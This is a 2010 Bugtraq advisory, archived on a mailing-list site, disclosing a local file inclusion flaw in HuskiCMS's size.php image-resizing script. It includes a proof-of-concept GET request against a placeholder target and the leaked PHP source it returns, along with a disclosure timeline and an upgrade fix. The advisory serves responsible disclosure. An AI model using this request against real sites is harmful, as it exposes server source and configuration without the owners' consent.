lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201002050514.o155E5ws009302@www3.securityfocus.com>
Date: Thu, 4 Feb 2010 22:14:05 -0700
From: noreply@...tanotherhacker.com
To: bugtraq@...urityfocus.com
Subject: JAHx102 - HuskiCMS local file inclusion

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
	header ('Content-Type: text/html; charset=utf-8');
	// Data Includes
	include_once "PHPLib/db_mysql.inc";
	include_once "Data/dbConnection.class.php";
	include_once "Data/dbConfig.class.php";
	include_once "Data/dataAdapter.class.php";
	include_once "Quicksite/Core/domxml.class.php";


	// Quicksite Core Includes
	include_once "Quicksite/Core/all.inc.php";
	
	// Configuration
	include_once "Quicksite/db.config.php";
	include_once "inc/vars.config.php";

	// Initialise the Site
	$site = new Site($_VARS['site']);
	print_r($_SESSION['login']);
	// Initialise the Page
	$page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

	// Load plugin sources
	$page->loadPluginSources();
	
	// Create the Page
	$page->createPage();
	
	echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ